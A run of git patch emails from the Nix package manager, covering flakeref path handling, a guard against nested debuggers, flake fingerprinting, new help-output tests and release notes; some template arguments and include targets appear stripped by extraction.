-		;;
-	nto-qnx*)
-		;;
-	os2-emx)
-		;;
-	*-eabi* | *-gnueabi*)
-		;;
-	-*)
-		# Blank kernel with real OS is always fine.
-		;;
-	*-*)
-		echo "Invalid configuration \`$1': Kernel \`$kernel' not known to work with OS \`$os'." 1>&2
-		exit 1
-		;;
-esac
-
-# Here we handle the case where we know the os, and the CPU type, but not the
-# manufacturer.  We pick the logical manufacturer.
-case $vendor in
-	unknown)
-		case $cpu-$os in
-			*-riscix*)
-				vendor=acorn
-				;;
-			*-sunos*)
-				vendor=sun
-				;;
-			*-cnk* | *-aix*)
-				vendor=ibm
-				;;
-			*-beos*)
-				vendor=be
-				;;
-			*-hpux*)
-				vendor=hp
-				;;
-			*-mpeix*)
-				vendor=hp
-				;;
-			*-hiux*)
-				vendor=hitachi
-				;;
-			*-unos*)
-				vendor=crds
-				;;
-			*-dgux*)
-				vendor=dg
-				;;
-			*-luna*)
-				vendor=omron
-				;;
-			*-genix*)
-				vendor=ns
-				;;
-			*-clix*)
-				vendor=intergraph
-				;;
-			*-mvs* | *-opened*)
-				vendor=ibm
-				;;
-			*-os400*)
-				vendor=ibm
-				;;
-			s390-* | s390x-*)
-				vendor=ibm
-				;;
-			*-ptx*)
-				vendor=sequent
-				;;
-			*-tpf*)
-				vendor=ibm
-				;;
-			*-vxsim* | *-vxworks* | *-windiss*)
-				vendor=wrs
-				;;
-			*-aux*)
-				vendor=apple
-				;;
-			*-hms*)
-				vendor=hitachi
-				;;
-			*-mpw* | *-macos*)
-				vendor=apple
-				;;
-			*-*mint | *-mint[0-9]* | *-*MiNT | *-MiNT[0-9]*)
-				vendor=atari
-				;;
-			*-vos*)
-				vendor=stratus
-				;;
-		esac
-		;;
-esac
-
-echo "$cpu-$vendor-${kernel:+$kernel-}$os"
-exit
-
-# Local variables:
-# eval: (add-hook 'before-save-hook 'time-stamp)
-# time-stamp-start: "timestamp='"
-# time-stamp-format: "%:y-%02m-%02d"
-# time-stamp-end: "'"
-# End:

From 11a1dcc43b3830dc25319719bccc71572136c57d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 16:59:06 +0100
Subject: [PATCH 550/654] Properly fail on flakerefs that don't point to a
 directory

Directly fail if a flakeref points to something that isn't a directory
instead of falling back to the logic of trying to look up the hierarchy
to find a valid flake root.

Fix https://github.com/NixOS/nix/issues/9868
---
 src/libexpr/flake/flakeref.cc          | 6 +++---
 tests/functional/flakes/search-root.sh | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 86a0982f3..09b5cecbc 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -102,6 +102,9 @@ std::pair parsePathFlakeRefWithFragment(
 
         if (isFlake) {
 
+            if (!S_ISDIR(lstat(path).st_mode))
+                throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+
             if (!allowMissing && !pathExists(path + "/flake.nix")){
                 notice("path '%s' does not contain a 'flake.nix', searching up",path);
 
@@ -124,9 +127,6 @@ std::pair parsePathFlakeRefWithFragment(
                     throw BadURL("could not find a flake.nix file");
             }
 
-            if (!S_ISDIR(lstat(path).st_mode))
-                throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
-
             if (!allowMissing && !pathExists(path + "/flake.nix"))
                 throw BadURL("path '%s' is not a flake (because it doesn't contain a 'flake.nix' file)", path);
 
diff --git a/tests/functional/flakes/search-root.sh b/tests/functional/flakes/search-root.sh
index d8586dc8a..6b137aa86 100644
--- a/tests/functional/flakes/search-root.sh
+++ b/tests/functional/flakes/search-root.sh
@@ -22,7 +22,7 @@ mkdir subdir
 pushd subdir
 
 success=("" . .# .#test ../subdir ../subdir#test "$PWD")
-failure=("path:$PWD")
+failure=("path:$PWD" "../simple.nix")
 
 for i in "${success[@]}"; do
     nix build $i || fail "flake should be found by searching up directories"

From 2f0bc6373ce1cc62f6b0ec955a227762904a66df Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Sat, 2 Mar 2024 10:34:20 +0100
Subject: [PATCH 551/654] Don't fail if a flakeref directly points to the
 flake.nix

Just warn and redirect it to the parent directory
---
 src/libexpr/flake/flakeref.cc | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 09b5cecbc..6c534f429 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -102,8 +102,18 @@ std::pair parsePathFlakeRefWithFragment(
 
         if (isFlake) {
 
-            if (!S_ISDIR(lstat(path).st_mode))
-                throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+            if (!S_ISDIR(lstat(path).st_mode)) {
+                if (baseNameOf(path) == "flake.nix") {
+                    // Be gentle with people who accidentally write `/foo/bar/flake.nix` instead of `/foo/bar`
+                    warn(
+                        "Path '%s' should point at the directory containing the 'flake.nix' file, not the file itself. "
+                        "Pretending that you meant '%s'"
+                        , path, dirOf(path));
+                    path = dirOf(path);
+                } else {
+                    throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+                }
+            }
 
             if (!allowMissing && !pathExists(path + "/flake.nix")){
                 notice("path '%s' does not contain a 'flake.nix', searching up",path);

From 2625e9fb0a787809e492cacdab6707b1e4863adf Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Fri, 1 Mar 2024 13:07:01 -0800
Subject: [PATCH 552/654] Ban building Nix with NDEBUG

When reviewing old PRs, I found that #9997 adds some code to ensure one
particular assert is always present. But, removing asserts isn't
something we do in our own release builds either in the flake here or in
nixpkgs, and is plainly a bad idea that increases support burden,
especially if other distros make bad choices of build flags in their Nix
packaging.

For context, the assert macro in the C standard is defined to do nothing
if NDEBUG is set.

There is no way in our build system to set -DNDEBUG without manually
adding it to CFLAGS, so this is simply a configuration we do not use.
Let's ban it at compile time.

I put this preprocessor directive in src/libutil.cc because it is not
obvious where else to put it, and it seems like the most logical file
since you are not getting a usable nix without it.
---
 src/libutil/util.cc                 | 4 ++++
 tests/unit/libstore/outputs-spec.cc | 2 --
 2 files changed, 4 insertions(+), 2 deletions(-)

diff --git a/src/libutil/util.cc b/src/libutil/util.cc
index 75bb31c9b..06124bf15 100644
--- a/src/libutil/util.cc
+++ b/src/libutil/util.cc
@@ -9,6 +9,10 @@
 
 #include 
 
+#ifdef NDEBUG
+#error "Nix may not be built with assertions disabled (i.e. with -DNDEBUG)."
+#endif
+
 namespace nix {
 
 void initLibUtil() {
diff --git a/tests/unit/libstore/outputs-spec.cc b/tests/unit/libstore/outputs-spec.cc
index 456196be1..63cde681b 100644
--- a/tests/unit/libstore/outputs-spec.cc
+++ b/tests/unit/libstore/outputs-spec.cc
@@ -6,11 +6,9 @@
 
 namespace nix {
 
-#ifndef NDEBUG
 TEST(OutputsSpec, no_empty_names) {
     ASSERT_DEATH(OutputsSpec::Names { std::set { } }, "");
 }
-#endif
 
 #define TEST_DONT_PARSE(NAME, STR)           \
     TEST(OutputsSpec, bad_ ## NAME) {        \

From b1ad729add0714cd123ea96497adf0ef14f683c4 Mon Sep 17 00:00:00 2001
From: Olmo Kramer 
Date: Sun, 3 Mar 2024 13:51:40 +0100
Subject: [PATCH 553/654] Add test for `nix flake update` with multiple inputs

---
 tests/functional/flakes/flakes.sh | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/tests/functional/flakes/flakes.sh b/tests/functional/flakes/flakes.sh
index 7506b6b3b..427290883 100644
--- a/tests/functional/flakes/flakes.sh
+++ b/tests/functional/flakes/flakes.sh
@@ -564,6 +564,16 @@ nix flake lock "$flake3Dir"
 nix flake update flake2/flake1 --flake "$flake3Dir"
 [[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
 
+# Test updating multiple inputs.
+nix flake lock "$flake3Dir" --override-input flake1 flake1/master/$hash1
+nix flake lock "$flake3Dir" --override-input flake2/flake1 flake1/master/$hash1
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+
+nix flake update flake1 flake2/flake1 --flake "$flake3Dir"
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+
 # Test 'nix flake metadata --json'.
 nix flake metadata "$flake3Dir" --json | jq .
 

From e6b9432542673a451b058ad2f0a7f1b4c20d3fbf Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 12:48:21 +0100
Subject: [PATCH 554/654] Add release note

---
 doc/manual/rl-next/arg-from-file.md | 9 +++++++++
 1 file changed, 9 insertions(+)
 create mode 100644 doc/manual/rl-next/arg-from-file.md

diff --git a/doc/manual/rl-next/arg-from-file.md b/doc/manual/rl-next/arg-from-file.md
new file mode 100644
index 000000000..5849b11a3
--- /dev/null
+++ b/doc/manual/rl-next/arg-from-file.md
@@ -0,0 +1,9 @@
+---
+synopsis: "CLI options `--arg-from-file` and `--arg-from-stdin`"
+prs: 10122
+---
+
+The new CLI option `--arg-from-file` *name* *path* passes the contents
+of file *path* as a string value via the function argument *name* to a
+Nix expression. Similarly, the new option `--arg-from-stdin` *name*
+reads the contents of the string from standard input.

From cbfd211b39fe053bb8a7ff416a7bf1c09b3d1fbf Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 12:49:32 +0100
Subject: [PATCH 555/654] Fix build

---
 src/libcmd/common-eval-args.hh | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 7548bd3b7..25ce5b9da 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -6,6 +6,8 @@
 #include "common-args.hh"
 #include "search-path.hh"
 
+#include 
+
 namespace nix {
 
 class Store;

From 4b15ca2ffb710d96eb34ac47683abdd85d236f92 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Mon, 4 Mar 2024 16:07:03 +0100
Subject: [PATCH 556/654] add tests for showing help

---
 package.nix               |  2 +
 tests/functional/help.sh  | 79 +++++++++++++++++++++++++++++++++++++++
 tests/functional/local.mk |  3 +-
 3 files changed, 83 insertions(+), 1 deletion(-)
 create mode 100644 tests/functional/help.sh

diff --git a/package.nix b/package.nix
index 20796a386..a90973b4c 100644
--- a/package.nix
+++ b/package.nix
@@ -24,6 +24,7 @@
 , libgit2
 , libseccomp
 , libsodium
+, man
 , lowdown
 , mdbook
 , mdbook-linkcheck
@@ -213,6 +214,7 @@ in {
     git
     mercurial
     openssh
+    man # for testing `nix-* --help`
   ] ++ lib.optionals (doInstallCheck || enableManual) [
     jq # Also for custom mdBook preprocessor.
   ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux
diff --git a/tests/functional/help.sh b/tests/functional/help.sh
new file mode 100644
index 000000000..74531c5d0
--- /dev/null
+++ b/tests/functional/help.sh
@@ -0,0 +1,79 @@
+source common.sh
+
+clearStore
+
+# test help output
+
+nix-build --help
+nix-shell --help
+
+nix-env --help
+nix-env --install --help
+nix-env --upgrade --help
+nix-env --uninstall --help
+nix-env --set --help
+nix-env --set-flag --help
+nix-env --query --help
+nix-env --switch-profile --help
+nix-env --list-generations --help
+nix-env --delete-generations --help
+nix-env --switch-generation --help
+nix-env --rollback --help
+
+nix-store --help
+nix-store --realise --help
+nix-store --serve --help
+nix-store --gc --help
+nix-store --delete --help
+nix-store --query --help
+nix-store --add --help
+nix-store --add-fixed --help
+nix-store --verify --help
+nix-store --verify-path --help
+nix-store --repair-path --help
+nix-store --dump --help
+nix-store --restore --help
+nix-store --export --help
+nix-store --import --help
+nix-store --optimise --help
+nix-store --read-log --help
+nix-store --dump-db --help
+nix-store --load-db --help
+nix-store --print-env --help
+nix-store --generate-binary-cache-key --help
+
+nix-channel --help
+nix-collect-garbage --help
+nix-copy-closure --help
+nix-daemon --help
+nix-hash --help
+nix-instantiate --help
+nix-prefetch-url --help
+
+function subcommands() {
+  jq -r '
+def recurse($prefix):
+  if .commands then
+    .commands | to_entries[] | .key as $k |
+    ($prefix + " " + $k) as $newPrefix |
+    if .value | has("commands") then
+      (.value | recurse($newPrefix))
+    else
+      $newPrefix
+    end
+  else
+    $prefix
+  end;
+
+.args.commands | to_entries[] | .key as $cmd |
+  if .value | has("commands") then
+    (.value | recurse($cmd))
+  else
+    $cmd
+  end
+'
+}
+
+nix __dump-cli | subcommands | while IFS= read -r cmd; do
+    nix $cmd --help
+done
diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index 18eb887cd..e36323a45 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -129,7 +129,8 @@ nix_tests = \
   read-only-store.sh \
   nested-sandboxing.sh \
   impure-env.sh \
-  debugger.sh
+  debugger.sh \
+	help.sh
 
 ifeq ($(HAVE_LIBCPUID), 1)
   nix_tests += compute-levels.sh

From 4ee54339191a968991cbe89bdfb80659096421b0 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Mon, 5 Feb 2024 13:18:16 -0800
Subject: [PATCH 557/654] Add release note

---
 doc/manual/rl-next/forbid-nested-debuggers.md | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 doc/manual/rl-next/forbid-nested-debuggers.md

diff --git a/doc/manual/rl-next/forbid-nested-debuggers.md b/doc/manual/rl-next/forbid-nested-debuggers.md
new file mode 100644
index 000000000..a5924b24f
--- /dev/null
+++ b/doc/manual/rl-next/forbid-nested-debuggers.md
@@ -0,0 +1,32 @@
+---
+synopsis: Nested debuggers are no longer supported
+prs: 9920
+---
+
+Previously, evaluating an expression that throws an error in the debugger would
+enter a second, nested debugger:
+
+```
+nix-repl> builtins.throw "what"
+error: what
+
+
+Starting REPL to allow you to inspect the current state of the evaluator.
+
+Welcome to Nix 2.18.1. Type :? for help.
+
+nix-repl>
+```
+
+Now, it just prints the error message like `nix repl`:
+
+```
+nix-repl> builtins.throw "what"
+error:
+       … while calling the 'throw' builtin
+         at «string»:1:1:
+            1| builtins.throw "what"
+             | ^
+
+       error: what
+```

From 14b0356dc5897e4acb02ff18f06c919ffcf8f146 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Fri, 2 Feb 2024 20:07:42 -0800
Subject: [PATCH 558/654] Forbid nested debuggers

---
 src/libcmd/repl.cc  |  8 +-------
 src/libexpr/eval.cc | 19 +++++++++++++++++--
 src/libexpr/eval.hh |  2 ++
 src/libutil/fmt.hh  |  2 --
 4 files changed, 20 insertions(+), 11 deletions(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8b83608fa..75f20d635 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -336,13 +336,7 @@ ReplExitStatus NixRepl::mainLoop()
               printMsg(lvlError, e.msg());
             }
         } catch (EvalError & e) {
-            // in debugger mode, an EvalError should trigger another repl session.
-            // when that session returns the exception will land here.  No need to show it again;
-            // show the error for this repl session instead.
-            if (state->debugRepl && !state->debugTraces.empty())
-                showDebugTrace(std::cout, state->positions, state->debugTraces.front());
-            else
-                printMsg(lvlError, e.msg());
+            printMsg(lvlError, e.msg());
         } catch (Error & e) {
             printMsg(lvlError, e.msg());
         } catch (Interrupted & e) {
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index f2bbf20bb..722ff6908 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -762,10 +762,24 @@ std::unique_ptr mapStaticEnvBindings(const SymbolTable & st, const Stati
     return vm;
 }
 
+/**
+ * Sets `inDebugger` to true on construction and false on destruction.
+ */
+class DebuggerGuard {
+    bool & inDebugger;
+public:
+    DebuggerGuard(bool & inDebugger) : inDebugger(inDebugger) {
+        inDebugger = true;
+    }
+    ~DebuggerGuard() {
+        inDebugger = false;
+    }
+};
+
 void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & expr)
 {
-    // double check we've got the debugRepl function pointer.
-    if (!debugRepl)
+    // Make sure we have a debugger to run and we're not already in a debugger.
+    if (!debugRepl || inDebugger)
         return;
 
     auto dts =
@@ -792,6 +806,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
     auto se = getStaticEnv(expr);
     if (se) {
         auto vm = mapStaticEnvBindings(symbols, *se.get(), env);
+        DebuggerGuard _guard(inDebugger);
         auto exitStatus = (debugRepl)(ref(shared_from_this()), *vm);
         switch (exitStatus) {
             case ReplExitStatus::QuitAll:
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 01abd4eb1..368bb17b3 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -153,6 +153,7 @@ struct DebugTrace {
     bool isError;
 };
 
+
 class EvalState : public std::enable_shared_from_this
 {
 public:
@@ -222,6 +223,7 @@ public:
      */
     ReplExitStatus (* debugRepl)(ref es, const ValMap & extraEnv);
     bool debugStop;
+    bool inDebugger = false;
     int trylevel;
     std::list debugTraces;
     std::map> exprEnvs;
diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh
index e996f4ba2..77843f863 100644
--- a/src/libutil/fmt.hh
+++ b/src/libutil/fmt.hh
@@ -8,7 +8,6 @@
 
 namespace nix {
 
-namespace {
 /**
  * A helper for writing `boost::format` expressions.
  *
@@ -42,7 +41,6 @@ void setExceptions(boost::format & fmt)
         boost::io::too_many_args_bit ^
         boost::io::too_few_args_bit);
 }
-}
 
 /**
  * A helper for writing a `boost::format` expression to a string.

From 2e8f4faa100101e258b786494bac0996601cb4a1 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Mon, 4 Mar 2024 09:32:02 -0800
Subject: [PATCH 559/654] Fix build

Not sure why that was giving a duplicate symbol error, or why marking it
inline fixes it. Here it is!
---
 src/libutil/fmt.hh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh
index 77843f863..abbaf95b6 100644
--- a/src/libutil/fmt.hh
+++ b/src/libutil/fmt.hh
@@ -34,7 +34,7 @@ inline void formatHelper(F & f, const T & x, const Args & ... args)
 /**
  * Set the correct exceptions for `fmt`.
  */
-void setExceptions(boost::format & fmt)
+inline void setExceptions(boost::format & fmt)
 {
     fmt.exceptions(
         boost::io::all_error_bits ^

From 29049d26533fb9077b0214fad276804784e02e45 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:21:31 +0100
Subject: [PATCH 560/654] Implement getFingerprint() for store paths

---
 src/libfetchers/path.cc | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index 276fd1b36..8231492e8 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -147,6 +147,20 @@ struct PathInputScheme : InputScheme
         return {std::move(*storePath), input};
     }
 
+    std::optional getFingerprint(ref store, const Input & input) const override
+    {
+        /* If this path is in the Nix store, use the hash of the
+           store object and the subpath. */
+        auto path = getAbsPath(input);
+        try {
+            auto [storePath, subPath] = store->toStorePath(path.abs());
+            auto info = store->queryPathInfo(storePath);
+            return fmt("path:%s:%s", info->narHash.to_string(HashFormat::Base16, false), subPath);
+        } catch (Error &) {
+            return std::nullopt;
+        }
+    }
+
     std::optional experimentalFeature() const override
     {
         return Xp::Flakes;

From 6558da45f5497eb54cc42866f81a3660862056ff Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:22:23 +0100
Subject: [PATCH 561/654] LockedFlake::getFingerprint(): Use
 Input::getFingerprint()

---
 src/libcmd/installables.cc |  4 ++--
 src/libexpr/flake/flake.cc | 15 +++++++--------
 src/libexpr/flake/flake.hh |  2 +-
 3 files changed, 10 insertions(+), 11 deletions(-)

diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc
index d87d7b9b1..6db9bf9a1 100644
--- a/src/libcmd/installables.cc
+++ b/src/libcmd/installables.cc
@@ -443,10 +443,10 @@ ref openEvalCache(
     EvalState & state,
     std::shared_ptr lockedFlake)
 {
-    auto fingerprint = lockedFlake->getFingerprint();
+    auto fingerprint = lockedFlake->getFingerprint(state.store);
     return make_ref(
         evalSettings.useEvalCache && evalSettings.pureEval
-            ? std::optional { std::cref(fingerprint) }
+            ? fingerprint
             : std::nullopt,
         state,
         [&state, lockedFlake]()
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index fd9341504..4a69bb381 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -926,18 +926,17 @@ static RegisterPrimOp r4({
 
 }
 
-Fingerprint LockedFlake::getFingerprint() const
+std::optional LockedFlake::getFingerprint(ref store) const
 {
+    if (lockFile.isUnlocked()) return std::nullopt;
+
+    auto fingerprint = flake.lockedRef.input.getFingerprint(store);
+    if (!fingerprint) return std::nullopt;
+
     // FIXME: as an optimization, if the flake contains a lock file
     // and we haven't changed it, then it's sufficient to use
     // flake.sourceInfo.storePath for the fingerprint.
-    return hashString(HashAlgorithm::SHA256,
-        fmt("%s;%s;%d;%d;%s",
-            flake.path.to_string(),
-            flake.lockedRef.subdir,
-            flake.lockedRef.input.getRevCount().value_or(0),
-            flake.lockedRef.input.getLastModified().value_or(0),
-            lockFile));
+    return hashString(HashAlgorithm::SHA256, fmt("%s;%s;%s", *fingerprint, flake.lockedRef.subdir, lockFile));
 }
 
 Flake::~Flake() { }
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index 48907813f..1ba085f0f 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -119,7 +119,7 @@ struct LockedFlake
      */
     std::map, SourcePath> nodePaths;
 
-    Fingerprint getFingerprint() const;
+    std::optional getFingerprint(ref store) const;
 };
 
 struct LockFlags

From 8a6ef3bae525e04b4cf5f460edf5a8e49cf8928f Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Mon, 4 Mar 2024 19:25:28 +0100
Subject: [PATCH 562/654] less scary jq
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com>
---
 tests/functional/help.sh | 22 ++++++----------------
 1 file changed, 6 insertions(+), 16 deletions(-)

diff --git a/tests/functional/help.sh b/tests/functional/help.sh
index 74531c5d0..868f5d2e9 100644
--- a/tests/functional/help.sh
+++ b/tests/functional/help.sh
@@ -53,24 +53,14 @@ nix-prefetch-url --help
 function subcommands() {
   jq -r '
 def recurse($prefix):
-  if .commands then
-    .commands | to_entries[] | .key as $k |
-    ($prefix + " " + $k) as $newPrefix |
-    if .value | has("commands") then
-      (.value | recurse($newPrefix))
+    to_entries[] |
+    ($prefix + [.key]) as $newPrefix |
+    (if .value | has("commands") then
+      ($newPrefix, (.value.commands | recurse($newPrefix)))
     else
       $newPrefix
-    end
-  else
-    $prefix
-  end;
-
-.args.commands | to_entries[] | .key as $cmd |
-  if .value | has("commands") then
-    (.value | recurse($cmd))
-  else
-    $cmd
-  end
+    end);
+.args.commands | recurse([]) | join(" ")
 '
 }
 

From 8d23847571c2921558cbcc7593de19e7a2edd944 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Mon, 4 Mar 2024 19:25:44 +0100
Subject: [PATCH 563/654] fix indentation
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com>
---
 tests/functional/local.mk | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index e36323a45..8bb8e3600 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -130,7 +130,7 @@ nix_tests = \
   nested-sandboxing.sh \
   impure-env.sh \
   debugger.sh \
-	help.sh
+  help.sh
 
 ifeq ($(HAVE_LIBCPUID), 1)
   nix_tests += compute-levels.sh

From 2306e967674a7016c556e90e94e5f1e80171892a Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:30:38 +0100
Subject: [PATCH 564/654] nix profile upgrade: Always upgrade unlocked
 flakerefs

The "lockedRef" field is a misnomer, since it can be unlocked
(e.g. for a dirty Git workdir). In that case, `nix profile upgrade`
needs to assume that the package can have changed, and perform an
upgrade.
---
 src/nix/profile.cc | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d39a24d36..60b58a78b 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -648,7 +648,9 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
             assert(infop);
             auto & info = *infop;
 
-            if (element.source->lockedRef == info.flake.lockedRef) continue;
+            if (info.flake.lockedRef.input.isLocked()
+                && element.source->lockedRef == info.flake.lockedRef)
+                continue;
 
             printInfo("upgrading '%s' from flake '%s' to '%s'",
                 element.source->attrPath, element.source->lockedRef, info.flake.lockedRef);

From 32bf39c73a9681317c4288aab16038dc6b401900 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:37:43 +0100
Subject: [PATCH 565/654] nix flake metadata: Don't show locked URL if it's not
 locked

This is the case for e.g. dirty Git workdirs, where we would get

  $ nix flake metadata
  Resolved URL:  git+file:///home/eelco/Dev/nix-master
  Locked URL:    git+file:///home/eelco/Dev/nix-master
---
 src/nix/flake.cc | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 5fc3f4166..3cd702254 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -219,6 +219,8 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
             j["resolvedUrl"] = flake.resolvedRef.to_string();
             j["resolved"] = fetchers::attrsToJSON(flake.resolvedRef.toAttrs());
             j["url"] = flake.lockedRef.to_string(); // FIXME: rename to lockedUrl
+            // "locked" is a misnomer - this is the result of the
+            // attempt to lock.
             j["locked"] = fetchers::attrsToJSON(flake.lockedRef.toAttrs());
             if (auto rev = flake.lockedRef.input.getRev())
                 j["revision"] = rev->to_string(HashFormat::Base16, false);
@@ -235,9 +237,10 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
             logger->cout(
                 ANSI_BOLD "Resolved URL:" ANSI_NORMAL "  %s",
                 flake.resolvedRef.to_string());
-            logger->cout(
-                ANSI_BOLD "Locked URL:" ANSI_NORMAL "    %s",
-                flake.lockedRef.to_string());
+            if (flake.lockedRef.input.isLocked())
+                logger->cout(
+                    ANSI_BOLD "Locked URL:" ANSI_NORMAL "    %s",
+                    flake.lockedRef.to_string());
             if (flake.description)
                 logger->cout(
                     ANSI_BOLD "Description:" ANSI_NORMAL "   %s",

From 9ee590e11301cda2b5d6341fb77f13369c3107e6 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 21:54:35 +0100
Subject: [PATCH 566/654] PosixSourceAccessor::cachedLstat(): Use absolute path

Using the relative path can cause collisions between cache entries for
PosixSourceAccessors with different roots.
---
 src/libutil/posix-source-accessor.cc | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index f8ec7fc6b..e91943c4c 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -85,16 +85,18 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path)
 
 std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path)
 {
-    static Sync>> _cache;
+    static Sync>> _cache;
+
+    auto absPath = makeAbsPath(path);
 
     {
         auto cache(_cache.lock());
-        auto i = cache->find(path);
+        auto i = cache->find(absPath);
         if (i != cache->end()) return i->second;
     }
 
     std::optional st{std::in_place};
-    if (::lstat(makeAbsPath(path).c_str(), &*st)) {
+    if (::lstat(absPath.c_str(), &*st)) {
         if (errno == ENOENT || errno == ENOTDIR)
             st.reset();
         else
@@ -103,7 +105,7 @@ std::optional PosixSourceAccessor::cachedLstat(const CanonPath & pa
 
     auto cache(_cache.lock());
     if (cache->size() >= 16384) cache->clear();
-    cache->emplace(path, st);
+    cache->emplace(absPath, st);
 
     return st;
 }

From 4967c5ff6ba96b27ad1d855b3b32712c0fc3dfcf Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 22:24:12 +0100
Subject: [PATCH 567/654] Fix macOS build

---
 src/libutil/posix-source-accessor.cc | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index e91943c4c..41c2db59a 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -85,9 +85,11 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path)
 
 std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path)
 {
-    static Sync>> _cache;
+    static Sync>> _cache;
 
-    auto absPath = makeAbsPath(path);
